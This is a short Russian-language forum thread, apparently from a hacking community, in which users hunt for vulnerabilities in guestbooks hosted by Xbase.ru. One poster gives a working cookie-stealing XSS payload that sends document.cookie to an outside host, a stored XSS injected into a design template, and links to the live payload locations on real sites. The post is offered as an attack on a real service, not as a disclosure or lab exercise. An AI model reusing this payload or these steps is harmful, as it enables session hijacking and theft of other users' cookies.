![]() |
Xbase
кто-нибудь находил уязвимости в гостевых книгах от Xbase.ru ?
|
Цитата:
Если будет время можно будет глянуть получше :rolleyes: |
При регистрации Поля: Имя, УРЛ, Фамилия уязвимы... но вставить туда снифер не получится, 20 букв ограничение..
Еше ношёл, что в меню "Загрузка графики" можно создать файл 213.jpg и вписать туда Код:
<script>img = new Image(); img.src = "http://antichat.ru/cgi-bin/s.jpg?"+document.cookie;</script>Полазил еше не много и нашол активную xss: В меню "Настройка дизайна", дописываем в конец шаблона Код:
<script>alert()</script>ставим ковычку в сессию и смотрим исходный путь... Алерт: http://xbase.ru/index.php?nokia1 И картинка которая сворует куки: http://borz.ru/pers/9b/nokia1/12.jpg |
| Время: 11:01 |